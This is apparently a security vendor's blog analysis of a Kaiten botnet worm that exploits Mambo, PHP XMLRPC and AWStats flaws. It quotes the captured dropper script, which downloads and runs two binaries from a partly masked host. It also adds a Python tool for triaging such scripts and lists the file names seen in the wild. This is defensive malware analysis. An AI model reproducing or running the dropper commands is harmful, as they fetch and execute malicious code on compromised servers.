The IRC community has been aware of several networks with large Kaiten botnets. According to the Chief of Security of the Nightstar IRC network, one network has more than one thousand (1000) bots sitting in a single channel.
“The worm compromises web servers via one of several exploits, and then attempts to download a shell script, which in turn downloads a copy of the worm and a Kaiten bot, and executes them,” the Chief of Security explained.
This is just what we received in our honeypot nodes.
For this particular incident, the packet that we sniffed attempts to exploit a known Mambo vulnerability to execute a CGI script (PHP_DEFTOOL.A), which in turn downloads and executes a shell script named “micu” on the affected system.
This is what the shell script contains.
#!/bin/bash
cd /tmp
wget XXX.XXX.48.69/mare
chmod 744 mare
./mare
wget XXX.XXX.48.69/ro
chmod 744 ro
./ro
(The first two octets are intentionally changed to ‘XXX’ to avoid spreading the malicious links!)
When this script is executed it downloads the two ELF binaries, sets them as executable, and runs them on the compromised system.
The file ‘ro’ is already detected by Trend Micro as ELF_KAITEN.M; it is the copy of the bot being distributed. The file ‘mare’, on the other hand, is the worm component that spreads ‘micu’ to vulnerable web servers with the Mambo application installed. The cycle then repeats again and again.
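As an added illustration (not code from the original post or from Trend Micro), the following Python walks a dropper script of the kind shown above and reconstructs the download, chmod, execute chain, so an analyst can triage such scripts mechanically. It embeds the ‘micu’ script exactly as quoted (octets already masked as XXX) and assumes wget-style downloads and invocation via ./name or sh/bash name; the verdict labels are the author's own.

```python
import re
from typing import Dict

# The dropper script quoted on the page, with the first two octets masked as XXX by the post's authors.
MICU_SCRIPT = """#!/bin/bash
cd /tmp
wget XXX.XXX.48.69/mare
chmod 744 mare
./mare
wget XXX.XXX.48.69/ro
chmod 744 ro
./ro
"""

STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")          # world-writable dirs typically used for staging
DOWNLOAD_RE = re.compile(r"^wget\s+(?:-\S+\s+)*(\S+)")   # wget [flags] URL
CHMOD_RE = re.compile(r"^chmod\s+(\S+)\s+(\S+)")         # chmod MODE FILE
EXEC_RE = re.compile(r"^(?:\./|(?:sh|bash)\s+)(\S+)")    # ./FILE  or  sh FILE / bash FILE

def _executable_mode(mode: str) -> bool:
    """True if a chmod mode argument sets the owner execute bit (numeric like 744/0755, or symbolic like +x)."""
    if mode.isdigit():
        owner = mode[-3] if len(mode) >= 3 else "0"
        return int(owner, 8) & 1 == 1
    return "x" in mode

def analyze_dropper(script: str) -> Dict[str, object]:
    """Reconstruct the download -> chmod -> execute chain from a shell script, line by line."""
    downloaded: Dict[str, str] = {}   # local basename -> source URL
    made_exec = set()
    executed = []                     # files that complete the full chain, in script order
    staged_in_tmp = False
    for raw in script.splitlines():
        line = raw.strip()
        if line.startswith("cd ") and line.split()[1] in STAGING_DIRS:
            staged_in_tmp = True
            continue
        if (m := DOWNLOAD_RE.match(line)):
            url = m.group(1)
            downloaded[url.rsplit("/", 1)[-1]] = url
        elif (m := CHMOD_RE.match(line)) and m.group(2) in downloaded and _executable_mode(m.group(1)):
            made_exec.add(m.group(2))
        elif (m := EXEC_RE.match(line)):
            name = m.group(1)[2:] if m.group(1).startswith("./") else m.group(1)
            if name in made_exec:
                executed.append({"file": name, "source": downloaded[name]})
    verdict = "dropper" if executed and staged_in_tmp else "no full chain"
    return {"staged_in_tmp": staged_in_tmp, "downloads": downloaded, "executed": executed, "verdict": verdict}

if __name__ == "__main__":
    print(analyze_dropper(MICU_SCRIPT))
```

Run against the ‘micu’ script it reports both ‘mare’ and ‘ro’ as downloaded, made executable and run from /tmp; a script that downloads a file but never marks it executable does not complete the chain.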
“Shell scripts have been seen with names of ‘criman’, ‘nikons’, and ‘listen’. The worm has been seen with names of ‘pini’, ‘pin’, ‘lordnikon’, and ‘d’. The kaiten executables have been seen with names of ‘a’, ‘f’, ‘g’, ‘w’, ‘ko’, and ‘qs’,” the Chief of Security added.
The vulnerabilities this worm targets in order to propagate copies of itself and the bot are all web server vulnerabilities: the PHP XMLRPC exploit, the Mambo “mosConfig_absolute_path” vulnerability, and the AWStats “configdir” remote command execution exploit.
Judging from the list of names the Chief of Security mentioned, the packets we received in this particular incident may well have been generated by a newly compiled copy of the worm, because none of our file names appear on that list: our shell script is named ‘micu’, the copy of the bot is named ‘ro’, and the copy of the worm is named ‘mare’.
These lists will keep growing as long as there are vulnerable or unpatched web servers. To avoid or at least minimize these kinds of incidents, software should be patched or updated regularly.